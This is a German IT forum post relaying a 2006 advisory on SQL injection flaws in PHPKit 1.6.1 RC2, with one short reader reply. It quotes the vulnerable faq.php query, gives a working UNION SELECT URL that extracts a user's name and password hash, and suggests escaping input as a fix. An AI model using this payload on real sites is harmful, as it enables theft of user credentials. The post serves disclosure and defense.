Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst SQL-Injection in PHPKit

Mitglied: gnarff

gnarff (Level 2) - Jetzt verbinden

13.11.2006, aktualisiert 07.01.2009, 8390 Aufrufe, 1 Kommentar

In PHPKit 1.6.1 RC2 befinden sich einige sehr kritische Sicherheitslücken, die es einem Angreifer unter Umständen ermöglichen, den MD5-Hash eines Users auszulesen.

Nachdem letzte Woche ein Exploit 2 aufgetaucht ist, das eine Lücke in der Datei misc/finduser.php ausnutzt, habe ich mir das Script einmal etwas näher angesehen.
Es befinden sich mindestens in den Datein guestbook/print.php und faq/faq.php Möglichkeiten, SQL-Code unterzuschieben.

Code faq/faq.php (Zeile 20 ff.):

if ($catid!=0) {

$getfaqinfo=$DB->query("SELECT *

FROM ".$db_tab['faq']."

WHERE faq_answer!='-'

AND faq_catid='".$catid."' <-VULN

ORDER by faq_title ASC");

while($faqinfo=$DB->fetch_array($getfaqinfo)) {



Über eine manipulierte Anfrage an das Script kann das Passwort eines beliebigen Users ausgegeben werden:

/include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%20

1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20

FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1


Ein ähnlicher Fehler befindet sich auch in der Datei guestbook/print.php.

Da die Entwickler nach dem letzten Exploit leider keinen Patch gebracht haben, gehe ich davon aus, dass auch dieses mal keiner folgen wird.
Daher muss etwas "Dirty Patching" betrieben werden.
Einfachste Methode ist per mysql_real_escape_string die Eingabe des Users zu escapen.
Eine andere Möglichkeit ist das Addon Hack_Block , welches nicht nur vor dieser Attacke auf PHPKit schützt, sondern generell vor SQL-Injections schützen soll.
Habe das ganze mal kurz angetestet und war positiv überrascht.

[advisory by phillip niedziela - site; http:
www.bb-pcsecurity.de/ vom 10.11.2006]

saludos
gnarff
Mitglied: 16568
13.11.2006 um 22:39 Uhr
Wußt ich's doch, warum ich kein PHPKit einsetze ^^

Danke!


Lonesome Walker
Bitte warten ..
Ähnliche Inhalte
Sicherheitsgrundlagen
SQL-Injection Schwachstelle erklärt
Information von lastbreachSicherheitsgrundlagen

In diesem Video erkläre ich die Schwachstelle SQL-Injection mit Fehlerausgabe in der unsicheren Web-Anwendung DVWA (Damn Vulnerable Web App). ...

PHP

SQL Injection - PHP Anwendung mit MSSQL Datenbank

Frage von PowlFruitPHP8 Kommentare

Guten Tag Liebe Community, ich habe zurzeit folgendes Problem, und da ich mich mit der Problematik noch nicht sonderlich ...

PHP

PHP - mySQL - Injections, Schadcode verhindern?

Frage von DeeJayBeePHP3 Kommentare

Hallo zusammen, ich beschäftige mich gerade ein wenig mit php und mysql. Überall sind zwar nette Tutorials, aber irgendwie ...

Erkennung und -Abwehr

CSV-Import in Excel mit Code-Injection!

Information von LochkartenstanzerErkennung und -Abwehr3 Kommentare

Nur damit niemand denkt, da kann ja nicht viel passieren. Auch bei CSV-Dateien, sollte man genau hinsehen, wo die ...

Neue Wissensbeiträge
Ausbildung

Linux-Ausstieg in Niedersachsen - Windows statt Bugfix

Information von StefanKittel vor 2 TagenAusbildung35 Kommentare

Sind ja nur Steuergelder

Speicherkarten

Neuer Speicherkartentyp - zunächst nur für Huawei-Smartphones (künftig auch für Notebooks u. Tablets?)

Tipp von VGem-e vor 4 TagenSpeicherkarten5 Kommentare

Servus, als ob das "Chaos" i.S. Speicherkarten noch nicht groß genug wäre?! Evtl. kommt dieser neue Kartentyp bald auch ...

Sicherheit

Diverse D-Link-Router durch drei Schwachstellen kompromittierbar

Information von kgborn vor 4 TagenSicherheit1 Kommentar

Hat jemand D-Link-Router in Verwendung? Einige Modelle sind sicherheitstechnisch offen wie ein Scheunentor. Äußerst unschöne Sache, aber nichts neues ...

Hardware

100.000 Mikrotik-Router ungefragt von Hacker abgesichert

Information von 7Gizmo7 vor 5 TagenHardware4 Kommentare

Hallo zusammen, da hier ja öfters mal von Mikrotik gesprochen wird. Trotz Updates klafft eine Sicherheitslücke in Hundertausenden Mikrotik-Routern. ...

Heiß diskutierte Inhalte
Windows Userverwaltung
Passwortwechsel Zeitpunkt festlegen
Frage von Looser27Windows Userverwaltung27 Kommentare

Guten Morgen liebe Kolleginnen und Kollegen, da es eine Userin in meinem Urlaub geschafft hat, sich vom AD vollständig ...

Windows Server
Probleme im AD am Außenstandort
gelöst Frage von emeriksWindows Server19 Kommentare

Hi, wir haben ein Problem mit AD und GPO am Außenstandort und ich stehe momentan mächtig auf dem Schlauch. ...

Switche und Hubs
POE-Switche
gelöst Frage von MiStSwitche und Hubs13 Kommentare

Guten Morgen, ich überlege ob ich in unserem Netzwerk die aktuellen Switche (D-LINK DGS-1210-28) durch PoE-Switche ersetzen soll. Der ...

Windows Server
DNS - Bedingte Weiterleitung
gelöst Frage von m8ichaelWindows Server11 Kommentare

Guten Tag zusammen, ich stehe gerade bzgl. einer bedingten DNS-Weiterleitung etwas auf dem Schlauch: Ich möchte, dass für bestimmte ...